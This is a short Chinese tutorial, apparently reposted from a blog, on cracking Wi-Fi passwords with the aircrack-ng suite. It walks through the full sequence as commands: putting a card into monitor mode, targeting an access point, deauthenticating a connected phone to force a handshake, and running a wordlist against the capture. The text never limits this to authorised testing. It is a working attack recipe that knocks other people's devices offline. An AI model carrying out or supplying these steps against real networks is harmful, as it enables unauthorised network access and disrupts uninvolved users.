aircack-ng抓握手包

1.关闭影响进程

 airmon-ng check kill 

 将要进入监听模式的无线网卡断开它已连接的AP

2.查看无线网卡的名字

 ifconfig ,例如 wlan0

3.进入监听模式:

 airmon-ng start wlan0 

  启动成功, ifconfig 后发现多了一个mon0

4.扫描附件wifi

 airodump-ng mon0 

  扫描后,终端显示为上下2个部分,按空格键可以启动/停止动态刷新, 'a'键可以调整显示视图,上下方向键可以选定一行方便查看。其中默认视图中,上半部分是扫描到的AP以及其属性,例如信号强度,通道,bssid,essid等,下半部分显示的是有哪些机器(对应于STATE栏,就是它mac)连接到这个AP(对应的就是ESSID)。

5.监听指定AP

  执行下列命令要停止扫描,及停止步骤4的命令,因为扫描会不断切换channel,而监听某个AP时,这个AP的channel是固定的。

   airodump-ng --bssid AP‘s mac -c channel -w capfile mon0 

   --bssid:指定监听哪个AP(由AP’s mac指定)

  -c :指定这个AP的通道

       -w:捕获的包存入文件capfile

  注意选定AP:

    1.步骤4下半部分的 BSSID和STATE要都存在一个mac,意思是探测到一个wifi的BSSID,并且这个wifi被一个或多个机器连接上(STATE栏指示其mac),步骤6解释为什么要这样选定。

6.强制重连,使握手包出现

   aireplay-ng -0 2 -a AP's bssid -c phone's mac mon0 

         | |    |      |___连上这个wifi的手机的mac

         | |    |______________wifi的 BSSID

         | |______________________攻击次数

         |_________________________攻击方法

  攻击会导致手机和wifi断开连接。

  1.为什么要抓握手包?

    握手包里包含密码信息

  2.握手过程:

    假设是我的手机去连wifi,第一次肯定会要你输入密码。

      手机:我要连接你wifi

      wifi:你的密码

      手机:这是我的密码

      wifi:检查密码,正确,建立连接,错误,滚。

  对于一个已经过密码验证的手机和wifi,它们建立连接后交换的数据只不过是一些上网数据,抓它们没用,要抓就要抓包含密码的握手包,怎么让一个已验证过密码的连接再次出现握手包?最快的方法就是把手机踢下线,然后手机会自动重连,或者用手机的人发现手机断网了,他就会去连一下,这时握手包就出现了。这也就是为什么要选定一个有机器连接上的wifi来监听。

  不久就会在步骤5那个终端的第一行的末尾出现抓到握手包。若没出现,过几分钟重复攻击。

7.跑字典

  aircrack-ng  capfile.cap -w passwd.lst

原文地址:https://www.cnblogs.com/thammer/p/5157980.html